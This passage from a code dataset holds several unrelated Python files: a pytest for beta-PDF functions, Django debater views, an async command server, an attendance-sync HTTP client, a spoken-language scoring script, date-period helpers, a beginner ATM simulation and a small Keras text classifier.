pyFLUT.constructor\n\n\n@pytest.fixture(scope='module')\ndef read_SLDF_partially():\n return pyFLUT.constructor.read_ulf_run(prefix='res', directory='example/SLDF/',\n variables_range={'chist': [0, 1]})\n\nz_mean = 0.1\nz_var_scaled = 0.1\n\n\ndef test_beta_parameters():\n z_var = 0.01\n a, b = beta.beta_parameters(z_mean, z_var)\n assert a == (z_mean * (1 - z_mean) / z_var - 1) * z_mean\n assert b == (z_mean * (1 - z_mean) / z_var - 1) * (1 - z_mean)\n\n\ndef test_pdf_integration():\n #a, b = ulf.beta.beta_parameters(z_mean, z_var)\n data = pyFLUT.constructor.read_ulf('files/ulf/res_t0.05000.ulf')\n T = data['T']\n z = data['Z']\n #assert beta.calc_pdf(z, T, z_mean, z_var, n_poly=10) == 0\n plt.figure()\n z_var_scaled = [0.01, 0.1, 0.2, 0.3, 0.5, 0.9]\n\n for zvi in z_var_scaled:\n T_mean = beta.calc_pdf_zvar(z, T, zvi, n_poly=10)\n plt.plot(z, T_mean, label='Zvar={}'.format(zvi))\n #T_mean = beta.calc_pdf(z, T, 0.2, 0.012, n_poly=10)\n\n plt.plot(z, T, label='Laminar temperature')\n plt.xlabel('Z')\n plt.ylabel('T, K')\n plt.legend(loc=0)\n plt.savefig('test/test_beta_pdf_0.png')\n plt.close()\n\n\ndef test_one():\n \"\"\"\n test if the scaling of the beta-pdf is correctly done\n :return:\n \"\"\"\n Z = np.linspace(0, 1, 3)\n T = np.array([500.] * 3)\n\n T_mean = beta.calc_pdf(Z, T, 0.5, 0.1, n_poly=10)\n assert np.isclose(T_mean, T[0])\n","sub_path":"test/test_beta_pdf.py","file_name":"test_beta_pdf.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349090458","text":"from django.urls import reverse_lazy\nfrom django.db.models import Q\nfrom django.http import HttpResponse\n\nfrom django.conf import settings\n\nfrom django_filters import FilterSet\n\nfrom haystack.query import SearchQuerySet\n\nfrom dal import autocomplete\n\nfrom django_tables2 import Column\n\nfrom core.utils.generics import (\n CustomListView,\n CustomTable,\n CustomCreateView,\n CustomUpdateView,\n CustomDetailView,\n CustomDeleteView\n)\nfrom core.utils.rounds import get_tab_card_data\nfrom core.models.round import Round\nfrom core.models.debater import Debater\nfrom core.models.results.team import TeamResult\nfrom core.models.standings.toty import TOTY\n\nfrom core.forms import DebaterForm\nfrom core.utils.perms import has_perm\n\n\nclass DebaterFilter(FilterSet):\n class Meta:\n model = Debater\n fields = {\n 'id': ['exact'],\n 'first_name': ['icontains'],\n 'last_name': ['icontains'],\n 'school__name': ['icontains'],\n 'status': ['exact']\n }\n\n\nclass DebaterTable(CustomTable):\n id = Column(linkify=True)\n\n first_name = Column(linkify=True)\n last_name = Column(linkify=True)\n\n school_name = Column(verbose_name='School',accessor='school.name')\n\n class Meta:\n model = Debater\n fields = ('id',\n 'first_name',\n 'last_name',\n 'school_name',\n 'status')\n\n\nclass DebaterListView(CustomListView):\n public_view = True\n model = Debater\n table_class = DebaterTable\n template_name = 'debaters/list.html'\n\n filterset_class = DebaterFilter\n\n buttons = [\n {\n 'name': 'Create',\n 'href': reverse_lazy('core:debater_create'),\n 'perm': 'core.add_debater',\n 'class': 'btn-success'\n }\n ]\n\n\ndef num_distinct_tournaments(team):\n return len(list(set([result.tournament.id for result in team.team_results.all()])))\n\n\nclass DebaterDetailView(CustomDetailView):\n public_view = True\n model = Debater\n template_name = 'debaters/detail.html'\n\n buttons = [\n {\n 'name': 'Delete',\n 'href': 'core:debater_delete',\n 'perm': 'core.remove_debater',\n 'class': 'btn-danger',\n 'include_pk': True\n },\n {\n 'name': 'Edit',\n 'href': 'core:debater_update',\n 'perm': 'core.change_debater',\n 'class': 'btn-info',\n 'include_pk': True\n },\n ]\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n\n tournaments = []\n\n tournaments = [result.tournament \\\n for result in TeamResult.objects.filter(\n team__debaters=self.object\n ).all()]\n tournaments += [result.tournament \\\n for result in self.object.speaker_results.all()]\n\n if 'all' in self.request.GET:\n for team in self.object.teams.all():\n tournaments += [round.tournament for round in team.govs.all()]\n tournaments += [round.tournament for round in team.opps.all()]\n\n tournaments = list(set(tournaments))\n\n seasons = [tournament.season for tournament in tournaments]\n seasons = list(set(seasons))\n\n seasons.sort(key=lambda season: season, reverse=True)\n current_season = settings.CURRENT_SEASON\n\n if not len(seasons) == 0:\n current_season = self.request.GET.get('season', seasons[0])\n\n if current_season == '':\n current_season = seasons[0]\n\n seasons = [season \\\n for season in settings.SEASONS if season[0] in seasons]\n\n seasons.sort(key=lambda season: season[0], reverse=True)\n\n context['seasons'] = seasons\n\n context['current_season'] = current_season\n\n tournaments = [tournament \\\n for tournament in tournaments if tournament.season == current_season]\n\n tournaments.sort(key=lambda tournament: tournament.date)\n\n tournament_render = []\n\n for tournament in tournaments:\n to_add = {}\n to_add['tournament'] = tournament\n to_append = []\n\n to_append += [('team', result) \\\n for result in TeamResult.objects.filter(\n team__debaters=self.object\n ).filter(\n tournament=tournament\n ).order_by('-type_of_place').all()]\n to_append += [('speaker', result) \\\n for result in self.object.speaker_results.filter(\n tournament=tournament\n ).order_by('-type_of_place').all()]\n\n team_result = TeamResult.objects.filter(\n team__debaters=self.object\n ).filter(\n tournament=tournament\n ).first()\n\n gov_round = Round.objects.filter(\n gov__debaters=self.object\n ).filter(\n tournament=tournament\n )\n\n opp_round = Round.objects.filter(\n opp__debaters=self.object\n ).filter(\n tournament=tournament\n )\n\n # THIS IS WHERE YOU HAVE TO CHANGE THINGS #\n team = None if not team_result else team_result.team\n\n if not team and (gov_round.exists() or opp_round.exists()):\n if gov_round.exists():\n team = gov_round.first().gov\n else:\n team = opp_round.first().opp\n\n to_add['team'] = team\n to_add['data'] = to_append\n to_add['tab_card'] = get_tab_card_data(team, tournament)\n\n tournament_render.append(to_add)\n\n context['results'] = tournament_render \n\n context['totys'] = TOTY.objects.filter(\n team__debaters=self.object\n ).order_by(\n 'place',\n 'season'\n )\n\n context['sotys'] = self.object.soty.order_by(\n 'place',\n 'season'\n )\n\n context['notys'] = self.object.noty.order_by(\n 'place',\n 'season'\n )\n\n teams = [team for team in self.object.teams.all()]\n teams.sort(key=lambda team: (num_distinct_tournaments(team), team.toty_points), reverse=True)\n\n context['teams'] = teams\n\n context['videos'] = []\n context['videos'] += list(self.object.pm_videos.all())\n context['videos'] += list(self.object.lo_videos.all())\n context['videos'] += list(self.object.mg_videos.all())\n context['videos'] += list(self.object.mo_videos.all())\n\n context['videos'] = [video for video in context['videos']\n if has_perm(self.request.user, video)]\n\n return context\n\n\nclass DebaterUpdateView(CustomUpdateView):\n model = Debater\n\n form_class = DebaterForm\n template_name = 'debaters/update.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n\n context['totys'] = TOTY.objects.filter(\n team__debaters=self.object\n ).order_by(\n 'place',\n 'season'\n )\n\n context['sotys'] = self.object.soty.order_by(\n 'place',\n 'season'\n )\n\n context['notys'] = self.object.noty.order_by(\n 'place',\n 'season'\n )\n\n teams = [team for team in self.object.teams.all()]\n teams.sort(key=lambda team: (num_distinct_tournaments(team), team.toty_points), reverse=True)\n\n context['teams'] = teams\n\n return context \n\n\nclass DebaterCreateView(CustomCreateView):\n model = Debater\n\n form_class = DebaterForm\n template_name = 'debaters/create.html'\n\n def post(self, *args, **kwargs):\n to_return = super().post(*args, **kwargs)\n\n if 'ajax' in self.request.POST:\n return HttpResponse(self.object.id)\n return to_return\n\n\nclass DebaterDeleteView(CustomDeleteView):\n model = Debater\n success_url = reverse_lazy('core:debater_list')\n\n template_name = 'debaters/delete.html'\n\n\nclass DebaterAutocomplete(autocomplete.Select2QuerySetView):\n def get_result_label(self, record):\n return '<%s> %s (%s)' % (record.id,\n record.name,\n record.school.name)\n \n def get_queryset(self):\n qs = None\n if not self.q:\n qs = Debater.objects\n if self.q:\n qs = SearchQuerySet().models(Debater).filter(content=self.q)\n\n qs = [q.pk for q in qs.all()]\n\n qs = Debater.objects.filter(id__in=qs)\n\n qs = qs.order_by('-pk')\n\n school = self.forwarded.get('school', None)\n\n if school:\n qs = qs.filter(school__id=school)\n\n return qs\n \n","sub_path":"core/views/debater_views.py","file_name":"debater_views.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596957015","text":"import aiohttp_jinja2\nimport asyncio\nimport configparser\nimport logging\nimport jinja2\nimport websockets\n\nimport views\nimport games\n# import generic.game.base\n\nfrom aiohttp import server, web\nfrom time import gmtime, strftime\n\nfrom generic import routes\n\nDEBUG = True\n\n\nclass BaseCommandServer(object):\n\n def __init__(self, server_type=None, host=None, port=None, loop=None):\n logging.info('Init %s Server on host %s:%s' % (server_type, host, port))\n self._server_type = server_type\n self._loop = loop or asyncio.get_event_loop()\n self._init_server(host, port)\n\n def start(self):\n self._server = self._loop.run_until_complete(self._server)\n logging.info(' %s has started.' % (self._server_type))\n\n def stop(self):\n self._server.close()\n logging.info('%s has stopped.' % (self._server_type))\n\n\nclass StreamCommandServer(BaseCommandServer):\n _instance = None\n\n def _init_server(self, host, port):\n self._app = web.Application(loop=self._loop)\n self._server = websockets.serve(self.process_request, host, port)\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(StreamCommandServer, cls).__new__(cls)\n return cls._instance\n\n @asyncio.coroutine\n def process_request(self, websocket, path):\n while True:\n yield from websocket.send(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n yield from asyncio.sleep(2)\n yield from websocket.close()\n\n\nclass HttpCommandServer(BaseCommandServer):\n _instance = None\n\n def _init_server(self, host, port):\n self._app = web.Application()\n self._load_routes()\n self._server = self._loop.create_server(self._app.make_handler(),\n host, port)\n\n def __init__(self, templates=None, **kwargs):\n super().__init__(**kwargs)\n if templates:\n aiohttp_jinja2.setup(self._app,\n loader=jinja2.FileSystemLoader(templates))\n \n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(HttpCommandServer, cls).__new__(cls)\n return cls._instance\n\n def _load_routes(self):\n logging.debug('Loading Application Routes:\\n%s' % '\\n'.join(str(r) for r in routes.ROUTES))\n for route in routes.ROUTES:\n self._app.router.add_route(*route)\n\n\nif __name__ == '__main__':\n config = configparser.ConfigParser()\n config.read('etc/command_server.conf')\n host = config.get('commandServer', 'host')\n port = config.get('commandServer', 'port')\n templates = config.get('commandServer', 'templates')\n logging.basicConfig(level=logging.DEBUG)\n loop = asyncio.get_event_loop()\n server = HttpCommandServer(server_type='Http Server', host=host, port=port, loop=loop, templates=templates)\n socket_server = StreamCommandServer(server_type='Stream Server', host=host, port=8765, loop=loop)\n try:\n server.start()\n socket_server.start()\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n server.stop()\n socket_server.stop()\n loop.close()\n","sub_path":"command_server/command_server.py","file_name":"command_server.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"625398354","text":"# -*- coding: utf-8 -*-\n\n#import urllib2\nfrom tornado import curl_httpclient\nfrom tornado.curl_httpclient import CurlAsyncHTTPClient\nfrom tornado.ioloop import IOLoop\nfrom tornado.httpclient import HTTPRequest\nfrom tornado.httputil import HTTPHeaders\nimport urllib\n\nDefault_URL = {\n 'updateStudent' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/updateStudent',\n 'SyncAttLog' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/syncRecord',\n 'NewRecord' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/newRecord',\n 'getStudent' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/getStudent',\n 'GetCmd' : 'http://',\n }\n\nClIENT_TOKEN = 'gh_2837e31e28ed'\n\nclass ServerHandler() :\n\n def __init__(self):\n self.url_list = Default_URL;\n self.http_client = CurlAsyncHTTPClient()\n self.stdudents_buf = []\n def updateStudents(self,sn,fresh=False):\n if (len(self.stdudents_buf) != 0) and (False == fresh) :\n return;\n self.stdudents_buf = []\n data = {'token':ClIENT_TOKEN,'SN':sn}\n data_send = urllib.parse.urlencode(data)\n request = HTTPRequest(url=self.url_list['updateStudent'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_updateStudents)\n def resp_updateStudents(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_updateStudents : \",response.body)\n def get_updated_students(self):\n return self.stdudents_buf\n\n\n def newRecord(self,record,sn):\n data = {'token':ClIENT_TOKEN,'SN':sn,'record':record}\n data_send = urllib.parse.urlencode(data)\n print(\"data_send : \", data_send)\n request = HTTPRequest(url=self.url_list['NewRecord'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_newRecord)\n def resp_newRecord(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_newRecord : \", response.body)\n\n def syncAttLog(self,records,sn):\n data = {'token':ClIENT_TOKEN,'SN':sn,'records':records}\n data_send = urllib.parse.urlencode(data)\n request = HTTPRequest(url=self.url_list['SyncAttLog'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_syncAttLog)\n def resp_syncAttLog(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_syncAttLog : \", response.body)\n\n\n def getServerCmd(self,sn):\n data = {'token':ClIENT_TOKEN,'SN':sn}\n data_send = urllib.parse.urlencode(data)\n request = HTTPRequest(url=self.url_list['GetCmd'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_getServerCmd)\n def resp_getServerCmd(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_getServerCmd : \", response.body)\n\n\nSERVER_Handler = ServerHandler();\n\nif __name__ == \"__main__\":\n sn = '3637165101475'\n record = {\n 'PIN': '101010101010',\n 'TIME': '2017-08-03 11:30:28',\n 'STATUS': 255,\n 'VERIFY': '2',\n 'WORKCODE': '0',\n 'RESERVED1': '0',\n 'RESERVED2': '0'\n }\n\n SvHd = SERVER_Handler\n #SvHd.updateStudents()\n SvHd.newRecord(record,sn)\n IOLoop.instance().start()\n","sub_path":"connectToServer.py","file_name":"connectToServer.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605327192","text":"import sys\ndef my_except_hook(exctype, value, traceback):\n print('There has been an error in the system')\n \nimport warnings\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nimport parselmouth\nfrom parselmouth.praat import call, run_file\nimport glob\nimport errno\nimport csv,sys\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport time\nimport os\nfrom subprocess import check_output\nfrom sklearn import preprocessing\nimport queue\nimport soundfile as sf\nimport _thread \nimport pickle\nfrom scipy.stats import binom\nfrom scipy.stats import ks_2samp\nfrom scipy.stats import ttest_ind\nfrom pandas import read_csv\n\n\n\naudioFilesPath=\"dataset\"+\"/\"+\"VAHAN-monologue-30\"+\"/\" # Path for audio-files\n\npa1=\"dataset\"+\"/\"+\"datanewchi22.csv\"\npa2=\"dataset\"+\"/\"+\"stats.csv\"\npa3=\"dataset\"+\"/\"+\"datacorrP.csv\"\npa4=\"dataset\"+\"/\"+\"datanewchi.csv\"\npa5=\"dataset\"+\"/\"+\"datanewchi33.csv\"\npa6=\"dataset\"+\"/\"+\"datanewchi33.csv\"\npa7=\"dataset\"+\"/\"+\"datanewchi44.csv\"\n\n\npa8=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"MLTRNL.praat\"\npa9=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"myspsolution.praat\"\n\n\nresult_array = np.empty((0, 27))\n\n\ndef mysppron(m,p,q):\n\tsound=m\n\tsourcerun=p \n\tpath=q\n\tobjects= run_file(sourcerun, -20, 2, 0.3, \"yes\",sound,path, 80, 400, 0.01, capture_output=True)\n\t#print(objects[0],objects[1]) # This will print the info from the sound object, and objects[0] is a parselmouth.Sound object\n\tz1=str(objects[1]) # This will print the info from the textgrid object, and objects[1] is a parselmouth.Data object with a TextGrid inside\n\tz2=z1.strip().split()\n\tz3=int(z2[13]) # will be the integer number 10\n\tz4=float(z2[14]) # will be the floating point number 8.3\n\tdb= binom.rvs(n=10,p=z4,size=10000)\n\ta=np.array(db)\n\tb=np.mean(a)*100/10\n\tprint (\"Pronunciation_posteriori_probability_score_percentage= :%.2f\" % (b))\n\treturn round(b,2)\npronunciation = []\nfiles = []\nfor soundi in os.listdir(audioFilesPath):\n\tif soundi.endswith('.mp3'):\n\t\tfiles.append(soundi)\n\t\tsoundi = os.path.join(audioFilesPath,soundi)\n\t\tprint(soundi)\n\t\t#Pronunciation_posteriori_probability_score_percentage\n\t\tbi=mysppron(soundi,pa9,audioFilesPath)\n\t\tpronunciation.append(bi)\n\t\t# feature extraction\n\t\tobjects= run_file(pa8, -20, 2, 0.3, \"yes\", soundi, audioFilesPath, 80, 400, 0.01, capture_output=True)\n\t\tz1=( objects[1]) # This will print the info from the textgrid object, and objects[1] is a parselmouth.Data object with a TextGrid inside\n\t\tz3=z1.strip().split()\n\t\tz2=np.array([z3])\n\t\tresult_array=np.append(result_array,[z3], axis=0)\nprint(pronunciation)\t\nnp.savetxt(pa1,result_array, fmt='%s',delimiter=',')\n\n#Data and features analysis \ndf = pd.read_csv(pa1,\n\t\t\t\t\t\tnames = ['avepauseduratin','avelongpause','speakingtot','avenumberofwords','articulationrate','inpro','f1norm','mr','q25',\n\t\t\t\t\t\t\t\t'q50','q75','std','fmax','fmin','vowelinx1','vowelinx2','formantmean','formantstd','nuofwrds','npause','ins',\n\t\t\t\t\t\t\t\t'fillerratio','xx','xxx','totsco','xxban','speakingrate'],na_values='?')\n\nscoreMLdataset=df.drop(['xxx','xxban'], axis=1)\nscoreMLdataset.to_csv(pa7, header=False,index = False)\nnewMLdataset=df.drop(['avenumberofwords','f1norm','inpro','q25','q75','vowelinx1','nuofwrds','npause','xx','totsco','xxban','speakingrate','fillerratio'], axis=1)\nnewMLdataset.to_csv(pa5, header=False,index = False)\nnamess=nms = ['avepauseduratin','avelongpause','speakingtot','articulationrate','mr',\n\t\t\t\t\t\t\t\t'q50','std','fmax','fmin','vowelinx2','formantmean','formantstd','ins',\n\t\t\t\t\t\t\t\t'xxx']\ndf1 = pd.read_csv(pa5,\n\t\t\t\t\t\tnames = namess)\ndf33=df1.drop(['xxx'], axis=1)\nprint(df33)\narray = df33.values\narray=np.log(array)\nx = array[:,0:13]\n\nprint(\" \")\nprint(\" \")\nprint(\"====================================================================================================\")\nprint(\"HERE ARE THE RESULTS, your spoken language level (speaking skills).\")\nprint(\"a: just started, a1: beginner, a2: elementary, b1: intermediate, b2: upper intermediate, c: master\") \nprint(\"====================================================================================================\")\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"CART_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_CART_model = model.predict(x)\npredictions_proba_CART_model = list(model.predict_proba(x))\nprint(\"CART MODEL 58% Accuracy\")\nprint(predictions_CART_model)\nprint(model.predict_proba(x))\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"KNN_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_KNN_model = model.predict(x)\npredictions_proba_KNN_model = list(model.predict_proba(x))\nprint(\"65% accuracy \",predictions_KNN_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"LDA_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_LDA_model = model.predict(x)\npredictions_proba_LDA_model = list(model.predict_proba(x))\nprint(\"70% accuracy \",predictions_LDA_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"LR_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_LR_model = model.predict(x)\npredictions_proba_LR_model = list(model.predict_proba(x))\nprint(\"67% accuracy \",predictions_LR_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"NB_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_NB_model = model.predict(x)\npredictions_proba_NB_model = list(model.predict_proba(x))\nprint(\"64% accuracy \",predictions_NB_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"SVN_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_SVN_model = model.predict(x)\nprint(\"63% accuracy \",predictions_SVN_model)\n# print(np.array(predictions_SVN_model).shape)\n\n\n\ndataSave = pd.DataFrame({\n\t\"files\" : files,\n\t\"pronunciation\" : pronunciation,\n\t\"predictions_CART_model\" : predictions_CART_model,\n\t\"predictions_proba_CART_model\" : predictions_proba_CART_model,\n\t\"predictions_KNN_model\" : predictions_KNN_model,\n\t\"predictions_proba_KNN_model\" : predictions_proba_KNN_model,\n\t\"predictions_LDA_model\" : predictions_LDA_model,\n\t\"predictions_proba_LDA_model\" : predictions_proba_LDA_model,\n\t\"predictions_LR_model\" : predictions_LR_model,\n\t\"predictions_proba_LR_model\" : predictions_proba_LR_model,\n\t\"predictions_NB_model\" : predictions_NB_model,\n\t\"predictions_proba_NB_model\" : predictions_proba_NB_model,\n \n\t\"predictions_SVN_model\" : predictions_SVN_model\n})\n\n# Result file name \ndataSave.to_csv('VAHAN-monologue-30_result.csv',index=False)","sub_path":"spokenlanguageassessment.py","file_name":"spokenlanguageassessment.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"272051497","text":"from functools import lru_cache\n\n@lru_cache(maxsize = 10000)\ndef fibonacci(n):\n if n == 1:\n return 1\n if n == 2:\n return 1\n if n > 2:\n return fibonacci(n-2) + fibonacci(n-1)\nfor i in range(2, 501):\n print(fibonacci(i)/fibonacci(i-1))\n","sub_path":"recursion_practise.py","file_name":"recursion_practise.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"499012410","text":"import datetime\n\nimport datefuncs\n\nMONTHS = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\ndef single_month_end(month, year, col_tag):\n tag_label = '%s %d' % (MONTHS[month-1], year)\n \n end_of_this_month = datefuncs.end_of_month(month,year)\n end_of_prev_month = datefuncs.end_of_prev_month(month,year)\n \n columns = [end_of_prev_month.isoformat(), col_tag, end_of_this_month.isoformat()]\n column_titles = [end_of_prev_month.isoformat(), tag_label, end_of_this_month.isoformat()]\n return columns, column_titles\n \ndef single_quarter_end(quarter, year, col_tag):\n tag_label = 'Q%s %d' % (quarter, year)\n \n end_of_this_qtr = datefuncs.end_of_quarter(quarter,year)\n end_of_prev_qtr = datefuncs.end_of_prev_quarter(quarter,year)\n \n columns = [end_of_prev_qtr.isoformat(), col_tag, end_of_this_qtr.isoformat()]\n column_titles = [end_of_prev_qtr.isoformat(), tag_label, end_of_this_qtr.isoformat()]\n return columns, column_titles\n \n\ndef quarterly_periods(year):\n columns = ['%sQ%d' % (year, x) for x in range(1,5)]\n column_titles = ['Q1', 'Q2', 'Q3', 'Q4']\n return columns, column_titles\n\ndef quarter_ends(year):\n columns = [datefuncs.end_of_prev_year(int(year)).isoformat()]\n column_titles = ['end of %d' % (int(year)-1)]\n\n for q in [1,2,3,4]:\n columns.append(datefuncs.end_of_quarter(q, int(year)).isoformat())\n column_titles.append('end of Q%d' %q)\n \n return columns, column_titles\n\ndef annual_periods(year):\n columns = ['%s' % year]\n column_titles = [str(year)]\n return columns, column_titles\n\ndef annual_ends(year):\n columns = [datefuncs.end_of_prev_year(int(year)).isoformat(), year, datefuncs.end_of_year(int(year)).isoformat()]\n column_titles = ['end of %d' % (int(year)-1), 'chg in %s' % year, 'end of %s' % year]\n return columns, column_titles\n\ndef monthly_periods(year):\n columns = ['%sM%s' % (year, '%02d' % x) for x in range(1,13)]\n column_titles = MONTHS \n return columns, column_titles\n\ndef monthly_ends(year):\n columns = [datefuncs.end_of_prev_year(int(year))] + datefuncs.month_ends(int(year))\n columns = [x.isoformat() for x in columns]\n column_titles = ['end of %d' % (int(year)-1)] + MONTHS\n return columns, column_titles\n\ndef trailing_monthly_periods(dt):\n next_month = datefuncs.start_of_next_month(dt)\n start = datetime.date(dt.year-1,dt.month,1)\n finish = dt\n\n months = list(datefuncs.monthrange(start, finish))\n columns = ['%sM%s' % (x[0], '%02d' % x[1]) for x in months]\n column_titles = columns\n \n return columns, column_titles\n\ndef trailing_monthly_ends(dt):\n next_month = datefuncs.start_of_next_month(dt)\n start = datetime.date(dt.year-1,dt.month,1)\n finish = dt\n\n months = list(datefuncs.monthrange(start, finish))\n columns = [datefuncs.end_of_month(x[1],x[0]).isoformat() for x in months]\n column_titles = columns \n \n return columns, column_titles\n\ndef multiyear_periods(dt, years):\n start = datefuncs.start_of_month(dt.month, dt.year)\n finish = datetime.date(start.year + years, start.month, start.day)\n\n months = list(datefuncs.monthrange(start, finish))\n\n columns = ['%sM%s' % (x[0], '%02d' % x[1]) for x in months]\n column_titles = columns\n\n return columns, column_titles\n \ndef multiyear_ends(dt, years):\n start = datefuncs.start_of_month(dt.month, dt.year)\n finish = datetime.date(start.year + years, start.month, start.day)\n\n months = list(datefuncs.monthrange(start, finish))\n\n columns = [datefuncs.end_of_month(x[1],x[0]).isoformat() for x in months]\n column_titles = columns\n\n return columns, column_titles\n","sub_path":"accountifie/toolkit/utils/make_config.py","file_name":"make_config.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"88272950","text":"Balance=50000\n#this function for inter your pin code number:....\ndef pin_code():\n print(\"Please insert your card\")\n i=1\n while i<=3:\n #print(\"please insert your card\\n\")\n pin=input(\"enter the pin code: \")\n if pin==\"1234\":\n print(\"your pin code is correct\\n\")\n print(\"Please wait\\n\")\n print(\"Thank You\")\n break\n print(\"chance\",3-i)\n i=i+1\nprint(\"you already use 3 chance and Now your pin card is\\nblock\")\n \n#this function for transaction and about for saving account:.....\ndef option2():\n print(\"choose any withdrawl option:\\n \")\n #1.saving\n #2.current or credit\n option2=input(\"enter the withdrawl option:\\n \")\n if option2==\"2\":\n trans_action()\n pin_code()\n elif option2==\"1\":\n print(\"SAVING\")\n print(Balance)\n#this function for choose option for prossess... \ndef option1():\n option1=input(\"enter the any option: \")\n if option1==\"1\":\n print(\"CASH WITHDRWAL\")\n print(\"1.SAVING\\n2.CURRENT or CREDIT\\n\")\n option2()\n elif option1==\"2\":\n print(\"BALANCE INQUERY\")\n print(\"In your account have balance: \",Balance)\n#this function for your transaction...... \ndef trans_action():\n #Balance=50000\n transaction=int(input(\"enter the amount\\nHow many ammount you want: \"))\n if transactionBalance:\n print(\"In your account no extra transaction\")\n else:\n print(\"your transaction in being processed\")\n\n# this is main function for calling another function.....\ndef A_T_M():\n #Balance=500000\n print(\"WELCOME TO ATM\\n\")\n print(\"you have to chose lanhguage:\\n1.English\\n2.Hindi\\n\")\n language=input(\"enter the language: \")\n if language==\"1\":\n print(\"chose any option \\n1.CASH WITHDRWAl\\n2.BAlANCE INQUERY\\n\")\n option1()\n #pin_code()\n else:\n print(\"you have only english language\")\nA_T_M()\n","sub_path":"ATM_in_function/ATM_Question_in_Function.py","file_name":"ATM_Question_in_Function.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"443291883","text":"from tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Embedding\n\nimport numpy as np\n\n\n\ndocs = ['너무 재밌네요', '최고예요', '참 잘 만든 영화에요', '추천하고 싶은 영화입니다', \\\n '한번 더 보고 싶네요', '글쎄요', '별로예요', '생각보다 지루하네요', '연기가 어색해요', '재미없어요']\n\ndocs_class = np.array([1,1,1,1,1,0,0,0,0,0])\n\n\n\ntoken = Tokenizer()\ntoken.fit_on_texts(docs)\n\n\n\nx = token.texts_to_sequences(docs)\n\npadding_x = pad_sequences(x, 4)\n\n\n\nword_size = len(token.word_index) + 1\nmodel = Sequential()\nmodel.add(Embedding(word_size, 8, input_length=4))\nmodel.add(Flatten())\nmodel.add(Dense(1, activation=\"sigmoid\"))\n\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\nmodel.fit(padding_x, docs_class, epochs=20)\n\nprint(\"\\n Accuracy: %.4f\" % (model.evaluate(padding_x, docs_class)[1]))","sub_path":"RNN/RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"645403120","text":"# encoding: utf-8\nfrom django.core.exceptions import ValidationError\nimport re\n\n\nmac_pattern = 